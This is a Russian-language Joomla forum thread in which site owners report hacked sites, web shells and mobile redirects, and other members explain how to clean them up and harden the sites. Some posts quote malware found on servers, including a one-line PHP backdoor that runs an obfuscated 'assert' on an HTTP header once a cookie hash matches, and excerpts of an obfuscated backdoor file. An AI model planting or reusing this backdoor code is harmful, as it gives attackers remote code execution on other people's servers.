Новости Joomla

Вышел релиз Revo PageBuilder Toolkit for YOOtheme Pro 1.6

Вышел релиз Revo PageBuilder Toolkit for YOOtheme Pro 1.6.2PageBuilder Toolkit - это специализированный плагин для конструктора страниц Yootheme Pro, содержит набор различных утилит для ускорения процесса работы и отладки макета, множественные улучшения в интерфейсе, включая поддержку dark mode, подсказки, быстрая смена разрешения в окне просмотра и много чего еще.v.1.6.2 Что нового?- Индикатор статусов: теперь не просто показывает состояние запросов, но и делает автоматические попытки их отправки при кратковременных сбоях в сети, а если это не помогло, то переводит конструктор в ручной режим, что позволяет сохранит макет и настройки темы прежде чем вы потеряете все, что было сделано с момента последнего сохранения- Подсветка ошибок в макете: плагин анализирует код страницы и может автоматически подсвечивать data атрибуты с кучей мусора, которые попадают в код страницы при копипасте из Figma в TinyMCE (пригодится для старых макетов, в текущей работе плагин сам очищает код мусора). Также есть подсветка семантических ошибок сборки - дубли h1 тега на странице и вложенных друг в друга заголовков.- Улучшена поддержка будущего релиза Yootheme Pro 5 и редактора CodeMirror 6Плагин для русскоязычных пользователей доступен в каталоге расширений SovMart и распространяется за символическую плату (100р). Разработчики Joomla расширений и партнеры автора могут получить плагин бесплатно.Для работы плагина необходим конструктор страниц Yootheme Pro.Разработчик плагина - участник нашего сообщества Александр Судьбинов (@alexrevo), член официальной группы поддержки Yootheme Pro. Страница расширенияОписание на сайте автора@joomlafeed#joomla #yootheme

WT IndexNow плагин для Joomla - отправка страниц сайта на переиндексацию в поисковые системы

WT IndexNow плагин для Joomla - отправка страниц сайта на переиндексацию в поисковые системы

👩‍💻 WT IndexNow плагин для Joomla - отправка страниц сайта на переиндексацию в поисковые системы.Пакет плагинов, обеспечивающий ручную и автоматическую отправку url адресов Joomla в поисковые системы на переиндексацию по протоколу IndexNow. Согласно документации протокол поддерживают все крупнейшие поисковые системы, кроме Google. Протокол служит для получения от сайтов URL, которые нужно переиндексировать заново или проиндексировать в первый раз как можно быстрее. Отправка адресов сайта таким образом существенно ускорит индексацию нового или изменённого контента поисковыми системами.Поисковые системы по этому протоколу обмениваются друг с другом данными, поэтому отправив URL в одну из них вы сообщаете их сразу всем. Протокол IndexNow поддерживают:- Amazon- Microsoft Bing- Naver- Seznam.cz- Yandex - YepСуточный лимит URL - 10000 в сутки. Возможна отправка вручную и автоматически. Поддерживаются:- материалы и категории материалов Joomla- контакты и категории контактов Joomla- SW JProjects - компонент каталога расширений для Joomla- JoomShopping - компонент интернет-магазина для Joomla- Phoca Download - компонент каталога файлоа для Joomla- Phoca Cart - компонент интернет-магазина для Joomla- RadicalMart - компонент интернет-магазина для JoomlaПакет плагинов работает с Joomla 4.3+. Тестировался на Joomla 5 и Joomla 6.Смотреть видео:- ВК Видео- RuTubeСсылки:Страница расширенияGitHub расширенияРаздел Поддержка протокола IndexNow в справке Яндекса@joomlafeed#joomla #seo #indexnow

0 Пользователей и 1 Гость просматривают эту тему.
  • 792 Ответов
  • 292286 Просмотров
*

capricorn

  • Завсегдатай
  • 1949
  • 118 / 3
А чего так бояться заражения? Что в этом такого страшного? Если есть норм бэкап, то найти заразу легко.

Цитировать
Встречается случаи когда кеш системы не чистится, и после чистки файлов все равно нет результата
один из способов это почистить в БД таблицу #_session  не всегда помогает на 100%, видимо еще и кешируется у провайдера или на каких либо удаленных серверах

Кэшируется обычно на компе вирусня и ждет ftp соединения.

« Последнее редактирование: 24.04.2015, 10:34:37 от capricorn »
*

creative3d

  • Захожу иногда
  • 196
  • 6 / 0
Что можно сделать для такой ситуации:
Мобильный редирект, шелл вроде бы найден и дырки залатаны. Но периодически появляется:
Код: javascript
<script type="text/javascript" src="http://*.ru"></script>

в настройках jcomments (был 1 раз в customHtml модуле)
Сперва сменил пароль user и root, вскоре опять появился. Потом сменил пароль к базе данных. Вирус исчез, но может через несколько недель опять появляться, опять меняю пароль к базе данных и всё нормально.
Какие тут дыры можно залатать, и нельзя ли как-нибудь по-другому прятать файл configuration.php ? Там права 444, но может этого недостаточно...
(установлен plugin Marco's SQL Injection - LFI Interceptor)
Кто еще сталкивался с подобного рода скриптом, напишите, что вам помогло.
Спасибо. ^-^
*

Владимир999

  • Захожу иногда
  • 106
  • 1 / 0
Проверь веб директорию http://yandex.ru/promo/manul#about
*

creative3d

  • Захожу иногда
  • 196
  • 6 / 0
Ссылка вроде занимательная, но сканирование не завершилось...
PHP error - Undefined variable: filePath
Сканирование давно проходили. Думал, может что-то конкретное, связанное с БД можно узнать. Т.к. насколько я понимаю, "взламывается" последнее время только пароль от БД. Хотя я плохо понимаю всё равно...
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
После работ связанных с чисткой и обновлением, закрытием всех уязвимостей, меняются все пароли иногда даже логины если они не уникальны (типа admin), пароли все набор цифр и букв как заглавные так и прописные и все возможные знаки, длина паролей от 12-14 знаков, закрывается панель управления http авторизацией как минимум. Все довольно просто.
*

creative3d

  • Захожу иногда
  • 196
  • 6 / 0
закрывается панель управления http авторизацией как минимум.
- А разве есть панели управления без авторизации? Может я чего-то не понимаю?..
- А вот у ispmanager и phpMyAdmin - root логин так и остается root? Где-то можно/нужно изменить? (хотя у phpMyAdmin вроде не root стоит, но root вроде тоже активен...)
- Для входа в админку сайта стоит ли включать новую фичу "двух-факторная авторизация"?
- Что думаете по поводу Admin Tools Pro от Akeeba?
Спасибо.
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
- А разве есть панели управления без авторизации? Может я чего-то не понимаю?..
http://httpd.apache.org/docs/2.2/mod/mod_auth_digest.html#msie
- А вот у ispmanager и phpMyAdmin - root логин так и остается root? Где-то можно/нужно изменить? (хотя у phpMyAdmin вроде не root стоит, но root вроде тоже активен...)
root используется только для настроек сервера, для работы с сайтом для каждого сайта! создается свой пользователь для панели и базы данных и своя бд
[/quote]
- Для входа в админку сайта стоит ли включать новую фичу "двух-факторная авторизация"?
Как пожелаете.
- Что думаете по поводу Admin Tools Pro от Akeeba?
Ни чего стороннего ни когда не рекомендую, правильная настройка сервера и своевременное обновление движка и расширений, хватает на все 100%.
*

askona

  • Захожу иногда
  • 98
  • 2 / 0
Стал счастливым обладателем очередного вируса на Joomla 1.5.26. Вроде избавился от редиректа и от самого шелла, отследил в логах как заходит взломщик на сайт. Когда удалил пару файлов редиректа, увидел в корне сайта только записанный  файл trd.php, загруженный у меня на глазах. Тут же его скачал. Прикладываю txt версию этого скрипта, суда по коду, он после выполнения должен был удалиться, но не успел. Комментарии в файле написаны по русски и много там интересного. И что самое интересное - редирект через redirect.ru был на ya.ru - для чего не понятно.
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Стал счастливым обладателем очередного вируса на Joomla 1.5.26. Вроде избавился от редиректа и от самого шелла, отследил в логах как заходит взломщик на сайт. Когда удалил пару файлов редиректа, увидел в корне сайта только записанный  файл trd.php, загруженный у меня на глазах. Тут же его скачал. Прикладываю txt версию этого скрипта, суда по коду, он после выполнения должен был удалиться, но не успел. Комментарии в файле написаны по русски и много там интересного. И что самое интересное - редирект через redirect.ru был на ya.ru - для чего не понятно.
Файлик довольна токи интересный и грамотно написан, на досуге по анализирую...
*

askona

  • Захожу иногда
  • 98
  • 2 / 0
Опишу, что я делал на своем сайте:
сам шелл прописался в папке: /administrator/components/com_phocagallery/front/assets/js/shadowbox/src/skin/classic/icons/config.php, при переходе по ссылке, требует ввод пароля, пароль тоже нашел в логах: ?6xlnchp7, судя по скрипту этот файл может прописаться в любую дальнюю папку. Далее Удалил строку с preg_replace сверху файла componets/com_weblinks/router.php. Нашел лишние файлы: /componets/com_content/articled.php , /componets/com_content/category.php , /includes/inc.class.php, снес их, получил ошибку в файле /includes/application.php ,в нем сверху удалил инклуд, и сайт заработал. Все это прописано в выложенном сверху скрипте. Может кому то поможет. Скорее всего, это было сделано для того, чтобы сайт выпал из индекса, смысл делать редирект на ya.ru. Как то так.
« Последнее редактирование: 02.06.2015, 16:29:25 от askona »
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Файлик довольна токи интересный и грамотно написан, на досуге по анализирую...
Обычный загрузочный/управляющий.

Вот всегда мысль одна есть и будет
- их бы энергию да в мирных целях
*

ShniderHost

  • Осваиваюсь на форуме
  • 24
  • 0 / 3
Лечим Joomla от вирусов :) https://joomla.shneider-host.ru/blog/optimizatsiia-i-bezopasnost-joomla/kak-ochistit-sait-joomla-ot-virusov

инструкция для новичков :) если вылечить не удалось самостоятельно, но рекомендую все же обратится к профессионалам, по поводу
flyingspook - слышал положительные отзывы, и берет он не дорого.
*

creative3d

  • Захожу иногда
  • 196
  • 6 / 0
Некоторые мои вопросы были проигнорированы, нашел ответы, их нужно добавить в тему!
-----------------------------------------------------------------------
configuration.php прячем за пределы сайта в любую папку:
administrator/includes/defines.php - здесь меняем путь,
/includes/defines.php - здесь меняем путь на
define('JPATH_CONFIGURATION', JPATH_ROOT . '/../folder');
Также прячем папки tmp и logs (путь в админке сайта)
*

dormidont

  • Осваиваюсь на форуме
  • 19
  • 0 / 0
хостинговый антивирь нашел очердную каку
httpdocs/plugins/editors/tinymce/jscripts/tiny_mce/plugins/example/wso2.php Sanesecurity.Malware.21995.Backdoor.UNOFFICIAL
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
хостинговый антивирь нашел очердную каку
httpdocs/plugins/editors/tinymce/jscripts/tiny_mce/plugins/example/wso2.php Sanesecurity.Malware.21995.Backdoor.UNOFFICIAL
Так это уже не атака, а shell залили
*

laralexy1

  • Новичок
  • 1
  • 0 / 0
Ребят, помогите убрать shell, ужасные ссылки левые на сайте  http://www.sosnovobor.ru/sanatornoe-lechenie.html
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Ребят, помогите убрать shell, ужасные ссылки левые на сайте  http://www.sosnovobor.ru/sanatornoe-lechenie.html

Пишите мне в аську, тема с отзывами https://forum.antichat.ru/threads/375030/
*

galyabu

  • Новичок
  • 2
  • 0 / 0
Здравствуйте! Похоже ли это на шелл? обнаружила его на всех своих сайтах на хосте (12 шт, из них Joomla - 11 шт). php файл был размещен даже на сайте html5 (собственно, он мне и помог обнаружить этот левый php). удалила его со всех сайтов и прекратилось еженедельное заражение js файлов мобильным редиректом.
*

rmnk

  • Осваиваюсь на форуме
  • 36
  • 1 / 1
Здравствуйте! Обнаружил, что в папке с шаблоном несколько дней назад появился файл .php со странным названием

файл содержит такой код (несколько цифр изменил на всякий случай)
Спойлер
[свернуть]

что это такое, кто-нибудь может подсказать?
« Последнее редактирование: 27.11.2015, 12:07:44 от rmnk »
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Ну явно не код скрипта Joomla . Нет проверки на вход через index.php Joomla. Загрузка кода из массива POST
Код
// no direct access

defined( '_JEXEC' ) or die( 'Restricted index access' );
Поставь временно JHackGuard и запрети выполнение POST . И ищи шелл.
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
что это такое, кто-нибудь может подсказать?
Вас уже взломали, чистите сайт и обновляйте все что требуется.
*

rmnk

  • Осваиваюсь на форуме
  • 36
  • 1 / 1
Вас уже взломали, чистите сайт и обновляйте все что требуется.

А есть смысл восстанавливать бекап недельной давности, например (файл этот залит позже) и расслабиться или все равно взломают опять, раз уже какая-то есть "дыра"
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
А есть смысл восстанавливать бекап недельной давности, например (файл этот залит позже) и расслабиться или все равно взломают опять, раз уже какая-то есть "дыра"
А как вы можете убедиться когда был файл залит?, можете сделать по старому бекапу сумму md5hash файлов старого движка и щас взломаного, если вы уверены что старый конечно чистый, выявить дату файлов которые попадают в разницу и проанализировать по ним логи с целью выявления ошибки и пофиксить, если просто откатывать бекап взлом рано или поздно снова повторится, также обязательны профилактические меры
*

rmnk

  • Осваиваюсь на форуме
  • 36
  • 1 / 1
Спасибо за ответы. Будем лечить
*

creative3d

  • Захожу иногда
  • 196
  • 6 / 0
Здравствуйте. Новогодний подарок тут получил, вроде он не успел сработать, но не знаю... Скажите, пожалуйста, что это такое, как, почему и зачем? !
1) В конец файла /includes/defines.php добавилась строчка:
Код: php
if(strpos(implode($_SERVER),"O:")){exit;}
2) В конец файла /libraries/joomla/access/rule.php добавилась строчка:
Код: php
if((md5(@$_COOKIE[ssid])=="0d39ee6941ac9d79b6fe314bbaca617e")){error_reporting(0);@array_map("a\x73"."sert",(array) $_SERVER[HTTP_X]);}
3) Появился новый файл: /libraries/simplepie/simplepie.lib.php (см. вложение)
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Здравствуйте. Новогодний подарок тут получил, вроде он не успел сработать, но не знаю... Скажите, пожалуйста, что это такое, как, почему и зачем? !
1) В конец файла /includes/defines.php добавилась строчка:
Код: php
if(strpos(implode($_SERVER),"O:")){exit;}
2) В конец файла /libraries/joomla/access/rule.php добавилась строчка:
Код: php
if((md5(@$_COOKIE[ssid])=="0d39ee6941ac9d79b6fe314bbaca617e")){error_reporting(0);@array_map("a\x73"."sert",(array) $_SERVER[HTTP_X]);}
3) Появился новый файл: /libraries/simplepie/simplepie.lib.php (см. вложение)
Первая строчка это фикс последней баги через сессию, второй это бегдор, вообщем чел ломанул и закрепился чтоб кроме него больше ни кто, не лез)))

Вложенный файл тоже является запутанным бегдором:
Цитировать
36. $id = $_SERVER['HTTP_SESSION'];
...
114.  */ $a='as';
...
 */ $b='sert'; $a=$a.$b;
...
161. */ $start = strpos($sess,'0d39ee');
...
202.  */ if($start===0){@${a}($id);}
« Последнее редактирование: 16.12.2015, 11:56:49 от winstrool »
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Скажите, пожалуйста, что это такое, как, почему и зачем? !
Возвращается 2011г.
Все взломы перешли давно в стадию.
Делают взломы для индивидуального использования, т.е. дальнейшей продажи или слива трафика.
Набирают сервера для чего то массового.
Ну и как все "угоны" сначала в отстойник, и потом использование. (многие и знать не будут что они уже давным давно взломаны)
*

creative3d

  • Захожу иногда
  • 196
  • 6 / 0
Возвращается 2011г.
Я имел в виду конкретно мой случай, если я правильно понял...

Спасибо за ответ, winstrool.
это фикс последней баги через сессию
Что за последняя бага? В 3.4.5 была? В 3.4.6 есть? И зачем он ее пофиксил? )
Т.е. он получается, что доступ ко всем файлам на сайте получил? А может он перейти в папки, те, что выше папки с сайтом?
Если взломали, то у чела-взломщика обязательно будут украденные пароли, или это как-то можно так сделать, что без взлома паролей, получаешь доступ?
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Я имел в виду конкретно мой случай, если я правильно понял...

Спасибо за ответ, winstrool.Что за последняя бага? В 3.4.5 была? В 3.4.6 есть? И зачем он ее пофиксил? )
Т.е. он получается, что доступ ко всем файлам на сайте получил? А может он перейти в папки, те, что выше папки с сайтом?
Если взломали, то у чела-взломщика обязательно будут украденные пароли, или это как-то можно так сделать, что без взлома паролей, получаешь доступ?
Если у вас хостинг и нет разграничений по папкам пользователям то да имеет доступ ко всему.
Профиксили баг 3.4.5 и закрыли возможность другим взломать.
Имеют доступ сейчас ко всему и файлам и к бд

В 3.4.6 нету она закрывает все что было в 3.4.5
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Редирект на спам ссылки. Как лчить?

Автор Евгений1980

Ответов: 2
Просмотров: 2518
Последний ответ 14.02.2024, 13:15:59
от wishlight
Скрипт для поиска вирусов и вредоносных скриптов на сайте "AI-Bolit"

Автор revisium

Ответов: 110
Просмотров: 71444
Последний ответ 30.08.2023, 12:53:33
от SeBun
Вирус редирект или взлом с редиректом Joomla 3.10

Автор Wany205

Ответов: 1
Просмотров: 3499
Последний ответ 25.05.2023, 08:49:57
от Театрал
Re: Кажется вирус на сайте

Автор motokraft

Ответов: 24
Просмотров: 5114
Последний ответ 04.05.2022, 14:04:17
от ProtectYourSite
Хостинг пишет, что найден вирус в /media/com_media/js/media-manager-es5.js

Автор AlexP750

Ответов: 6
Просмотров: 3522
Последний ответ 22.02.2022, 11:38:15
от AlexP750